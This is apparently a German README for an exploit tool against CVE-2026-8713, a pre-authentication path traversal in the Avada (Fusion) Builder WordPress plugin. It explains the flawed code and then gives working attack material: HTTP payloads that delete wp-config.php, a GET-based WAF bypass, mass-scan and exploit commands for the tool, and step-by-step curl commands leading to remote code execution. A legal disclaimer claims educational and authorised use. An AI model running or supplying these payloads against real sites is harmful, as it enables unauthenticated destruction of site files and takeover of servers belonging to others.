
Pre-Auth-Pfad-Traversierung zu willkürlichem Dateilöschen in Avada (Fusion) Builder <= 3.15.3, die zu RCE führt (CVSS 9.1)
CVE-2026-8713 ist eine kritische Schwachstelle mit CVSS 9.1 im Plugin/Theme Avada (Fusion) Builder für WordPress. Die Funktion maybe_delete_files() in der Klasse Fusion_Form_DB_Entries konstruiert Dateisystempfade aus angreiferkontrollierten Formulareingabewerten mittels einfacher Zeichenkettenersetzung – ohne realpath()-Validierung oder Verzeichnisbegrenzungsprüfungen.
Ein nicht authentifizierter Angreifer sendet ein Path-Traversal-Payload über den fusion_form_submit_ajax Handler. Wenn der Fusion_Form_DB_Privacy-Shutdown-Hook den Eintrag mit privacy_expiration_action=delete verarbeitet, wird die gezielte Datei vom Server entfernt.
| Version | Status |
|---|---|
| Fusion Builder ≤ 3.15.3 | Verwundbar |
| Fusion Builder ≥ 3.15.4 | Behoben |
| Avada Theme (alle) | Gebündeltes Plugin ggf. verwundbar |
Hinweis: Die Avada-Theme-Version (7.x) unterscheidet sich von der Fusion-Builder-Plugin-Version (3.x). Die Schwachstelle liegt im Plugin, der Scanner erkennt jedoch beide.
In fusion-builder/inc/class-fusion-form-db-entries.php löst die Methode maybe_delete_files() Dateipfade mittels Zeichenkettenersetzung ohne Begrenzungsvalidierung auf:
$file_path = str_replace($upload['url'], $upload['path'], $value);
// No realpath() check — path traversal sequences pass through
unlink($file_path);
1. Angreifer sendet Avada-Formular über wp_ajax_nopriv_fusion_form_submit_ajax
→ Path Traversal: ../../wp-config.php
→ privacy_expiration_action = delete
→ privacy_expiration_interval = 0
2. WordPress-Shutdown-Hook löst Fusion_Form_DB_Privacy aus
→ Verarbeitet gespeicherten Formulareintrag
→ Ruft maybe_delete_files() mit angreiferkontrolliertem Pfad auf
→ wp-config.php wird gelöscht
3. WordPress wechselt in den Setup-/Installationsmodus
→ Angreifer verbindet die Website mit einer schädlichen Datenbank
→ Vollständige Remote-Codeausführung
Der AJAX-Handler ist mit wp_ajax_nopriv_ registriert, wodurch er für nicht authentifizierte Benutzer zugänglich ist:
POST /wp-admin/admin-ajax.php
action=fusion_form_submit_ajax
form_id=<id>
privacy_expiration_action=delete
fusion_privacy_expiration_interval=0
fusion_form_field_<name>=../../wp-config.php
Viele Hosts blockieren POST an /wp-admin/admin-ajax.php. WordPress akzeptiert Parameter per GET an diesem Endpunkt, was eine triviale Umgehung ermöglicht:
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=<id>&privacy_expiration_action=delete&...
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt
# Nur Erkennung (Standard – keine Dateilöschung)
python cve_2026_8713.py -t target.com
# Massenerkennung
python cve_2026_8713.py -f targets.txt
# Exploit-Modus – wp-config.php löschen
python cve_2026_8713.py -t target.com --exploit
# Benutzerdefinierte Datei löschen
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"
-t, --target Einzelnes Ziel (Domain oder IP)
-f, --file Zielliste, eine pro Zeile
--exploit Dateilöschung aktivieren (Standard: nur Erkennung)
--delete PFAD Benutzerdefinierter zu löschender Dateipfad (Standard: wp-config.php)
-o, --output Ergebnisse in Datei speichern
--threads Arbeiter (Standard: 20)
-v, --verbose Detaillierte Ausgabe anzeigen
$ python cve_2026_8713.py -f targets.txt
CVE-2026-8713 Avada (Fusion) Builder | CVSS 9.1
Modus: Erkennung | Ziele: 521 | Arbeiter: 20
───────────────────────────────────────────────────────
[EXPLOIT] target-vuln.com 1.2s Formular #3 (AJAX offen)
[VULN] target-waf.com 2.1s Formular #1 (WAF blockiert)
[AVADA] target-noform.com 0.5s (kein Formular gefunden)
[-] target-noavada.com 0.3s
───────────────────────────────────────────────────────
Scan abgeschlossen | Zeit: 45s
───────────────────────────────────────────────────────
Ziele : 521
Avada erkannt : 47
Formulare gefunden : 12
Verwundbar : 9
$ python cve_2026_8713.py -t target.com --exploit -v
CVE-2026-8713 — Avada Builder Exploit
CVSS 9.1 | Pre-Auth | Path Traversal → Dateilöschung → RCE
[+] Avada-Formular gefunden: id=3
[+] POST form_id=3: HTTP 403 (WAF blockiert)
[+] GET form_id=3: HTTP 200 (WAF umgangen)
Host : target.com
Avada : JA
Formular : 3
Gelöscht : wp-config.php (Neuinstallation erzwungen → RCE)
Zeit : 3.2s
Schritt 1 — Avada überprüfen
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5
Schritt 2 — Formular-ID finden
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](https://github.com/shinthink/cve-2026-8713/blob/HEAD/%5Cd+)'
Schritt 3 — Formular mit Path Traversal senden
curl -sk -X POST \
-d 'action=fusion_form_submit_ajax' \
-d 'form_id=3' \
-d 'privacy_expiration_action=delete' \
-d 'fusion_privacy_expiration_interval=0' \
-d 'fusion_form_field_x=../../wp-config.php' \
'https://target.com/wp-admin/admin-ajax.php'
Schritt 4 — WAF-Umgehung (falls POST blockiert)
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'
Schritt 5 — RCE überprüfen und ausnutzen
# Site in install mode?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config gelöscht → Verbindung mit schädlicher DB → vollständige RCE
NUR ZU BILDUNGSZWECKEN UND AUTORISIERTEN TESTS.
Diese Software richtet sich an Sicherheitsexperten, die autorisierte Penetrationstests durchführen, Organisationen, die ihre eigene Infrastruktur prüfen, und Forscher, die die Ausnutzung von Schwachstellen untersuchen.
Unbefugter Zugriff auf Computersysteme ist illegal und kann gegen folgende Gesetze verstoßen:
- Vereinigte Staaten: Computer Fraud and Abuse Act (18 U.S.C. 1030)
- Indonesien: UU ITE Pasal 30 & 46
- Europäische Union: Directive 2013/40/EU
- Vereinigtes Königreich: Computer Misuse Act 1990
Die Autoren übernehmen keine Haftung für Missbrauch.
Dieses Projekt ist nicht mit ThemeFusion oder Avada verbunden.
| Ressource | Link |
|---|
| IONIX Advisory | ionix.io/threat-center/cve-2026-8713 |
| Wordfence Advisory | wordfence.com |
| Patchstack | patchstack.com |
| NVD Entry | CVE-2026-8713 |